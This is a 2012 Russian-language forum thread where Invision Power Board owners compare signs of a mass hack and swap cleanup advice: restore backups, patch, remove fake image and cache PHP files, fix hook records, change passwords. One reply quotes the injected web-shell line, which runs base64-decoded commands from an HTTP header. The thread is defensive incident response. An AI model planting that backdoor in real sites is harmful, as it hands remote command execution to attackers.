HOOKAHPRO Опубликовано 11 Ноября 2012 Жалоба Поделиться Опубликовано 11 Ноября 2012 25 October 2012 Стало известно об уязвимостях IPB... О чем было написанно на сайте http://community.invisionpower.com/Но пользователям преобретшим IPB у ibresource.ru об этом ни чего небыло сообщено...Заплатка для рускоязычного сообщества предоставлена только 07.11.2012.Собственно вопросы:1. Чем 14 дней занимались сотрудники ibresource.ru2. Почему небыли предупреждены клиенты Всем клиентам ibresource.ruПроверьте свой форум на наличие изменений в файлах...Здесь видно содержимое корневой директории одного из сайтов взломанного аккаунта:Подчеркнуты "лишние" папки и файлы, а также стандартные, если их подменили. Содержимое одной из "лишних" папок: Проверьте /uploads/profile/photo-128.jpg если там есть такой файл размер ~67.38 KBТо вы заражены... Так же вирусы приписываются в базе...в таблице `core_hooks_files` подменили путь к хукамв boardIndexRecentTopics вел к тому самому файлу /uploads/profile/photo-128.jpgи еще тут Дерзайте, проверяйте...И отписывайтесь...Очень хочется услышапть ответы от ibresource.ru etyjetkkj отреагировал на это 1 Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 KypoJIecoB Опубликовано 11 Ноября 2012 Жалоба Поделиться Опубликовано 11 Ноября 2012 у меня все чисто....и как то весной у меня появился вирус в картинке jpg....и тут же хостер закрыл все сайты и отписал мне письмо что хост заражен и я должен почистить...почистил и все норм)) Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 nstrochkov Опубликовано 11 Ноября 2012 Жалоба Поделиться Опубликовано 11 Ноября 2012 Подскажите, пожалуйста! /uploads/profile/photo-128.jpg - был. И внутри была не картинка.Никаких "лишних" файлов и папок как на скриншоте - не обнаружено. Что еще проверить и какие меры принять? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Креол Опубликовано 11 Ноября 2012 Жалоба Поделиться Опубликовано 11 Ноября 2012 Подскажите, пожалуйста! /uploads/profile/photo-128.jpg - был. И внутри была не картинка.Никаких "лишних" файлов и папок как на скриншоте - не обнаружено. Что еще проверить и какие меры принять? Необходимо проверить все папки имеющие право на запись на предмет посторонних php файлов, их можно отследить по дате. После вычистки - сменить все административные пароли. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 HOOKAHPRO Опубликовано 12 Ноября 2012 Автор Жалоба Поделиться Опубликовано 12 Ноября 2012 Подскажите, пожалуйста! /uploads/profile/photo-128.jpg - был. И внутри была не картинка.Никаких "лишних" файлов и папок как на скриншоте - не обнаружено. Что еще проверить и какие меры принять? Оптимально взять бэкап не зараженный числа так от 01.11.2012 и перезалить весь форум...Измененных и лишних файлов в форуме сейчас у вас будет очень много....например тут.../cache/9ed28f49e4a432d582c27def5cb172e3.php/cache/cache_clean.php/cache/2f617aab0a2e830c7370a745b88af170.php/cache/ipbcache.php/cache/view-cache.php это только на вскидку..))) Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 ChipZzz Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 Меня лично ломанули, как и море других форумов. Похоже все на автомате делается. Так что проверять ВСЕМ!Какие симптомы у меня были, например:Три "лишних" файла php в директории cache (имена могут быть разные, проверяйте).Самого гадского, а именно файла photo-128.jpg не было, слава богу, но это чисто "повезло".В базе данных остался мусор по этим трем файлам (это как минимум, что нашли).В общем после долгих плясок и танцев стало понятно, что нет никакой уверенности, что дрянь не сидит где-то еще, так что пришлось восстановиться из бэкапа, потому что теперь ей уже по-фигу наши патчи.(Зараза по отзывам распространяется с первых чисел ноября, но не факт, что кто-то не попал в конце октября). Пришлось сменить все пароли на все что можно у критичных аккаунтов (у хостера, на БД, на фтп, админам форума, форумному почтовому ящику и т.п.)Иначе говоря, событие действительно вселенского масштаба, народ кипит, объявления с предупреждениями своим форумчанам пишет, а здесь у IBR как всегда тишь, да гладь....Благодать! Мало того, IBR по-началу патчи от 07 ноября выложила даже не правленные под "русские" версии, тупо предоставила английские версии файлов, слава богу, потом дали "наши". В итоге мы "закрылись" только 11 числа, но.... было уже поздно ********-----------------------------**********Вот ссылка на обсуждение этой темы: http://ipbskins.ru/f...topic10798.htmlИ еще http://ipbmafia.ru/t...мов-которые-не/ Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Denis Chursinov Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 Хронология такая. 20 октября был опубликован эксплоит. 25 октября IPS выпустили патч. В тот же день IBR начали раздавать локализованную версию по запросу. Патч не закрывал уязвимость и был бесполезен, поэтому не имело смысла раздавать его массово. 06 ноября вышел рабочий патч. В тот же день IBR начали раздавать локализованную версию по запросу. 07 ноября появилась новость с локализованным патчем на форуме и сайте. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 nstrochkov Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 Оптимально взять бэкап не зараженный числа так от 01.11.2012 и перезалить весь форум...Измененных и лишних файлов в форуме сейчас у вас будет очень много....например тут.../cache/9ed28f49e4a432d582c27def5cb172e3.php/cache/cache_clean.php/cache/2f617aab0a2e830c7370a745b88af170.php/cache/ipbcache.php/cache/view-cache.phpБэкапы есть.Если не сложно - можно подробнее?Просто перезаписать старыми бэкапными файлами все "новые"?Убивать папку форума и перезаливать всё - картинки и прочий пользовательский аплоад же потеряю... А с изменениями в базе что делать? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 siv1987 Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 Патч не закрывал уязвимость и был бесполезен, поэтому не имело смысла раздавать его массово.Чушь. По крайней мере патч ИПС закрывал дыру от эксплойта котором были взломаны 99% процентов форумов. Позже вышел еще один обобщающий патч, для еще одного примерно такого недочета. Но так как школота и в первом то толком не особенно понимает, то со вторым небыло ни одного взлома. А ибр даже свой форум до конца не очистили. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Yape Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 У меня все чисто, пока, покажите пожалуйста, где скачать патч для русских версий? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 IBResource Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 http://forums.ibresource.ru/index.php?/topic/64833/Патч в этой теме полностью закрывает все возможные потенциальной уязвимости последних недель (обсуждаемых с конца октября до 7 ноября) Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 nstrochkov Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 http://forums.ibreso...p?/topic/64833/Патч в этой теме полностью закрывает все возможные потенциальной уязвимости последних недель (обсуждаемых с конца октября до 7 ноября)А если его ставить уже ПОСЛЕ того как имеются признаки заражения?Например, как в сообщении 5 в этой ветке. Есть инструкция по последующей чистке? Файлы? БД ? Den.fm отреагировал на это 1 Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Denis Chursinov Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 Патч не закрывал уязвимость и был бесполезен, поэтому не имело смысла раздавать его массово.Чушь. По крайней мере патч ИПС закрывал дыру от эксплойта котором были взломаны 99% процентов форумов. Позже вышел еще один обобщающий патч, для еще одного примерно такого недочета.Вам виднее. Я, к сожалению, не имею доступа даже к 1% форумов. А если его ставить уже ПОСЛЕ того как имеются признаки заражения?Например, как в сообщении 5 в этой ветке. Есть инструкция по последующей чистке? Файлы? БД ? Ставить нужно в любом случае. В БД ничего чистить не нужно. Лучший вариант удалить все файлы и перезаписать из резервной копии, сделанной до взлома. Если такой возможности нет, то ищите свежие файлы в папках cache,public,uploads,hooks и их подпапках, а также в корне форума. Это как правило php файл с длинным именем из случайных символов вроде 9ed28f49e4a432d582c27def5cb172e3 и удобочитаемый с той же датой создания. Внутри одного будет каркаc sql-лога, но вместо текста ошибки php-код:======================================================================================================= END ============================================================ /forum_or/index.php?<php?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?> =============================================================================================== ================== ============================================================================== Второй - обфусцированный код, обычно в начале идет длинное присвоение переменным значений, а затем несколько строк кода, составленного из этих переменных. Ну и картинка само собой, всегда 128ая. Второй способ взлома вместо картинки оставляет sh.php или zx.php в папке cache или корне форума, в остальном все тоже самое. Несколько раз видел код, дописанный в начало conf_global.php. После удаления всех новых файлов нужно сменить пароль к базе данных и к АЦ форума. Все это справедливо если ваш форум ломали готовым скриптом, если злоумышленник приложил немного фантазии, то мог и дописать в какой-нибудь существующий файл свой код или приписать код к шаблону внешнего вида в базе данных. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 HOOKAHPRO Опубликовано 12 Ноября 2012 Автор Жалоба Поделиться Опубликовано 12 Ноября 2012 у меня заражение датируется 28.10.2012.Просто перезаписать старыми бэкапными файлами все "новые"?Стереть все имеющееся и залить бэкап...Убивать папку форума и перезаливать всё - картинки и прочий пользовательский аплоад же потеряю...А у вас, что аплоадс не бэкапится???Если нет, то качать ее и на комп и проверять ручками, что картинка, а что скрипт...А с изменениями в базе что делать? Две нижние строки я удалил, а с верхней поступил так...Для начала попробуйте сделать переимпортирование всех хуков из админки. Если само не восстановится, то: В папке hooks ищете название файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php. И в ячейке 'hook_file_stored' вместо "../uploads/profile/photo-128.jpg" прописываете его. Потом в бекапах открываете этот файл, копируете содержимое и в ячейку 'hooks_source' вставляете. я вставил в hooks_source содержимое файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.phpОно соответствует бэкапному..))) Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 nstrochkov Опубликовано 12 Ноября 2012 Жалоба Поделиться Опубликовано 12 Ноября 2012 А у вас, что аплоадс не бэкапится???Бекапится всё. Постоянно и многократно. Я прошу отнестись с пониманием, но я не очень соображаю просто что как устроено внутри у IPB.Весь пользовательский аплоад - он только в папке /forum/uploads ?Т.е. все другие папки я могу смело перезаписать из бэкапа скажем от 25 октября и при этом никаких потерь на форуме не будет? Если нет, то качать ее и на комп и проверять ручками, что картинка, а что скрипт...Папку можно скачать на комп, открыть ее каким-нибудь faststone и он нарисует крестики вместо превьюшек на подозрительных файлах. Две нижние строки я удалил, а с верхней поступил так...Для начала попробуйте сделать переимпортирование всех хуков из админки. Если само не восстановится, то:В папке hooks ищете название файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php. И в ячейке 'hook_file_stored' вместо "../uploads/profile/photo-128.jpg" прописываете его.Потом в бекапах открываете этот файл, копируете содержимое и в ячейку 'hooks_source' вставляете. я вставил в hooks_source содержимое файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.phpОх... Не скажу, что всё понял, но попробую... Если не поможет - буду еще просить помощи. Спасибо! Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 nstrochkov Опубликовано 13 Ноября 2012 Жалоба Поделиться Опубликовано 13 Ноября 2012 HOOKAHPRO , всё получилось! Спасибо огромное! Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Yamamura Опубликовано 13 Ноября 2012 Жалоба Поделиться Опубликовано 13 Ноября 2012 Прям напасть какая-то по взломам в последнее время, видимо. У меня на днях разом были взломаны на одном домене сайт и вики. С форумом вроде бы пронесло, однако также имелись изменённые php-файлы с встроенным в их начало сторонним кодом. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 polk Опубликовано 16 Ноября 2012 Жалоба Поделиться Опубликовано 16 Ноября 2012 Мы заметили проблему 6 ноября - форум стал сильно тормозить, установили обновление системы безопасности, но оно помогло слабо. Написать в техподдержку письмо не получилось - ссылка из форума перестала подключаться, и выдавала ошибку. Форум вробе работал, но пропала функция поиска. Я сегодня написал письмо в техподдержку через клиент-центр, мне посоветовали почитать эту ветку и установить локализованную версию обновления безопасности. Если вчера на форуме регистрировалось несколько человек в день, то сегодня их количество увеличилось в десятки раз! Вручную забанил все айпи-адреса, но они продолжают лезть, как тараканы. Поудалял все php-файлы с длинными именами, ситуация не изменилась. Техподдержка разбираться не хочет. Посоветуте, братцы, что делать. В программировании я не силен, но зловредный код разыскать смогу.Только ведь это сколько файлов надо перелопатить? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 siv1987 Опубликовано 16 Ноября 2012 Жалоба Поделиться Опубликовано 16 Ноября 2012 Обновления безопасности к спам ботов отношения не имеет. Ставьте адекватную капчу, или запретите регистрацию если видите что не справляетесь. По поводу безопасности, нужно поставить заплатки и удалить все шеллы которые вам поставили. Но еще раз повторяю, к ботам и регистраций на сайте они отношение не имеет. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 Beavis Опубликовано 16 Ноября 2012 Жалоба Поделиться Опубликовано 16 Ноября 2012 Сегодня на всех форумах спамят... не только IPB. Видимо спамеры дырку какую то нашли Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 airmed Опубликовано 17 Ноября 2012 Жалоба Поделиться Опубликовано 17 Ноября 2012 Тоже из кеша поудалял кучу г**на Как можно проконтролировать активность этой гадости на случай если где-то еще осталась? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 WWWovan Опубликовано 18 Ноября 2012 Жалоба Поделиться Опубликовано 18 Ноября 2012 (изменено) Стоит версия 3.1.4.Вчера перестала открыватся админка форума. Выдает: "504 Gateway Time-out"Заплатки поставил 09.11. Сегодня нашел и удалил в папке cache несколько php-файлов с длинными именами. Может, кто сталкивался? Как вернуть к жизни админку? Изменено 18 Ноября 2012 пользователем WWWovan Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 HOOKAHPRO Опубликовано 18 Ноября 2012 Автор Жалоба Поделиться Опубликовано 18 Ноября 2012 Востонавить бэкап из более ранней версии...Поставить заплатки...Проверить файлы и базу на наличие нечести... Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 KypoJIecoB Опубликовано 19 Ноября 2012 Жалоба Поделиться Опубликовано 19 Ноября 2012 (изменено) проверил у себя.... все как то подозрительно чисто.... и так и сяк смотрел нет ничего.... может мне повезло Изменено 19 Ноября 2012 пользователем KypoJIecoB Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 nalssur Опубликовано 30 Ноября 2012 Жалоба Поделиться Опубликовано 30 Ноября 2012 Сегодня форум взломали, взлом проявлялся в том что пользователям мобильных устройств предлагалось поставить новые версии браузеров.Вредоносный код был записан в файле .htaccess Залез сюда, думал кто-то знает об этом взломе. У всех ок? Проблема обсуждается здесь например: http://ipbzona.ru/topic/3940-virus-pereadresacija/ Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 nalssur Опубликовано 30 Ноября 2012 Жалоба Поделиться Опубликовано 30 Ноября 2012 Может кому понадобится. Вредоносный код из файлов php вычистил, после того как нашел все такие файлы по совету отсюда: http://habrahabr.ru/post/136320/ Только конечно команда grep -rl ‘IPB_FIREWALL’ * Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
HOOKAHPRO
25 October 2012 Стало известно об уязвимостях IPB... О чем было написанно на сайте http://community.invisionpower.com/
Но пользователям преобретшим IPB у ibresource.ru об этом ни чего небыло сообщено...
Заплатка для рускоязычного сообщества предоставлена только 07.11.2012.
Собственно вопросы:
1. Чем 14 дней занимались сотрудники ibresource.ru
2. Почему небыли предупреждены клиенты
Всем клиентам ibresource.ru
Проверьте свой форум на наличие изменений в файлах...
Здесь видно содержимое корневой директории одного из сайтов взломанного аккаунта:
Подчеркнуты "лишние" папки и файлы, а также стандартные, если их подменили.
Содержимое одной из "лишних" папок:
Проверьте /uploads/profile/photo-128.jpg если там есть такой файл размер ~67.38 KB
То вы заражены...
Так же вирусы приписываются в базе...
в таблице `core_hooks_files` подменили путь к хукам
в boardIndexRecentTopics вел к тому самому файлу /uploads/profile/photo-128.jpg
и еще тут
Дерзайте, проверяйте...
И отписывайтесь...
Очень хочется услышапть ответы от ibresource.ru
38 ответов на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.